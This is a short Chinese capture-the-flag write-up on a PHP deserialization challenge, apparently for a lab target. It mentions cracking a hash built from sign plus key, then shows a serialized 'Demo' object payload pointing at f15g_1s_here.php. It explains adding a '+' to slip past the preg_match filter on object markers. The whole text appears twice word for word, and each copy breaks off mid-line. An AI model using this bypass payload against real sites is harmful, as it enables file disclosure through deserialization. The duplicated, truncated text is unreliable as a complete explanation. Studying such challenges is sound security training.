去解下hash
根据网页里的提示新的哈希是sign+key
代码审计:反序列化漏洞利用
如果不了解反序列漏洞去看下这篇文章
PHP反序列漏洞
第一点:绕过正则preg_match(’/[oc]:\d+:/i’, $var)
O:4:"Demo":1:{
s:10:"Demofile";s:16:"f15g_1s_here.php";}
加个+</
去解下hash
根据网页里的提示新的哈希是sign+key
代码审计:反序列化漏洞利用
如果不了解反序列漏洞去看下这篇文章
PHP反序列漏洞
第一点:绕过正则preg_match(’/[oc]:\d+:/i’, $var)
O:4:"Demo":1:{
s:10:"Demofile";s:16:"f15g_1s_here.php";}
加个+</